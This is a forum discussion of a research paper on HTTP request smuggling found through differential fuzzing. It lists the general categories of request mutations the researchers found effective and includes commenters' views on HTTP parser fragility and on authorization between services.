On a whole what I found more interesting here was just the techniques they came across through fuzzing that had some impact. Yes its interesting to see the specific combinations that were impacted, but in the real-world there are so many other potential combinations.
The dominate method for request smuggling as of the last few years has been with `Content-Length` and `Transfer-Encoding`. What I found most interesting and the biggest take-away as someone who has worked doing web-app assessments is more just the attacks that they found to work and cause problems.
I mean the details about particular server pairs having issues is great information, as is the fuzzing setup (great use of differential fuzzing) but I think more important is being able to take these potential attack avenues that they had success with and running them against your own deployments. Given how many applications internally are running their own stacks there is still a lot of room for potential issues. I can imagine people running with some of these for bounties in the near future.
A brief summary of the manipulations they had some success with are on pages 7-8. Though if you don't feel like reading, the "headline" version of the list gives you a pretty decent idea of what was having an impact:
Request Line Mutations
- Mangled Method - Distorted Protocol - Invalid Version - Manipulated Termination - Embedded Request Lines
Request Headers Mutations
- Distorted Header Value - Manipulated Termination - Expect Header - Identity Encoding - V1.0 Chunked Encoding - Double Transfer-Encoding
Request Body Mutations
- Chunk-Size Chunk-Data Mismatch - Manipulated Chunk-Size Termination - Manipulated Chunk-Extension Termination - Manipulated Chunk-Data Termination - Mangled Last-Chunk
And a bit of self-promotion but we talked about this paper on Monday on the DAY podcast I cohost (24m53s - 35m30s) https://www.youtube.com/watch?v=GmOuX8nHZuc&t=1497sReply
You know, articles like this make me wish an OS would actually have a built-in fast, reliable, fully-featured HTTP parser. I've written a couple of (very strict) HTTP parsers on my own, and this whole "request smuggling" is possibly only because the HTTP messages have rather delicate and fragile, totally non-robust framing and structure. Miss a letter in one of the relevant RFCs (IIRC, you need to read at least the first 3 RFCs to learn the complete wire format of an HTTP message) and you'll end with a subtly non-compliant and vulnerable parser.
And yet, every single programming language/platform build their own HTTP-handling library, usually several, of very varying quality and feature support. Again, it would not be as bad if HTTP was a robust format where you could skip recognizing and correctly dealing with half of the features you don't intend to support but it is not: even if you don't want to accept e.g. trailers, you still have to be aware of those. We have OpenSSL, why not also have OpenHTTP (in sans-io style)?Reply
the eternal cat mouse game, an escher triangle of misery, always going up and down at the same time, never really getting anywhereReply
Nice. Link to the whitepaper: https://bahruz.me/papers/ccs2021treqs.pdf
I only skimmed very quickly to look for which server setups they found new vulnerabilities for, and it looked like they tested a 2D matrix of popular webservers/caches/reverse-proxies with each other? Which is neat for automation, but in the real world I'm not usually going to be running haproxy behind nginx or vice versa. I'd be much more interested in findings for popular webserver->appserver setups, e.g., nginx in front of gunicorn/django.Reply
This sort of thing is why it's nice to have authz throughout your environment. A client request that gets incorrectly forwarded to a proxy should be rejected by the downstream service.
The problem is that people keep all of their authn/authz at the boundary and then, once you're past that, it's a free for all.
Every service needs to validate authorization of the request.Reply